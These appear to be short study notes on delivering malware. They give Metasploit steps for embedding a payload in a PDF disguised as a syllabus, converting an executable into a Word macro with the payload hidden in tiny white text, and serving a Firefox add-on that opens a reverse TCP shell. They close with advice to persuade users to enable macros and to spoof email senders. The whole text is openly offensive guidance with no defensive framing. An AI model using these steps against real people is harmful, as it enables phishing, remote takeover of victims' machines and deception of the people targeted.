Embedding Malware in PDFs
- Launch Metasploit
- search adobe_pdf
- set options
- set Payload
- set INFILENAME /root/Deskstop/syllabus.pdf
- set FILENAME bad_syllabus.pdf
- set LHOST <IP Address>
- exploit
- From here you can send the file as email, flash drives, etc
Embedding Malware into MACRO Word document
- Creating a malicious executable
- Converting to a visualbasic script – macro code
- Create a MS word document
- starting listener
- opening the malicious document
- collection session
Tool for embedding into word document exe2vba
This tool in kali can be located in /usr/share/metasploit-framework/tools/exploit
run the tool .sudo msf-exe2vba <exe (your malicious file)> <VBA (create new one>
Now go to the Windows machine and transfer the new vba file
Create new Word document.
Create a macro
- View tab
- Macros
- View macros
- give name
- create
Open VBA file and copy the macro code part and past it into the macro code page in word
Save changes.
We stil lhave to ebed the payload into the document
Copy the payload data part in from the VBA file
paste it into the word document.
Shrinking the font size makes it seem like a regular document. You can also make the text the color white
Due to macros being disabled by default, you will need to convince the end user to enable macros
Sending malware as browser addon
Another way to compromise is to send the malware as a browser addon
Metasploit can be used to create this
- Launch Metasploit framework
- search firefox_xpi
- use
- show payloads
- use shell payload with reverse tcp connection
- set SRVHOST — this will be the server will an app server will be started. This will be our machine
- set SRVPORT– you can use 8080 for this
- set URIPATH –this is the path of the payload
- set LHOST
- exploit
You can now copy the URL and paste it in the address bar to verify the server is running
For sending a link through email, you can use YOPMail.com. This will allow you to spoof a sender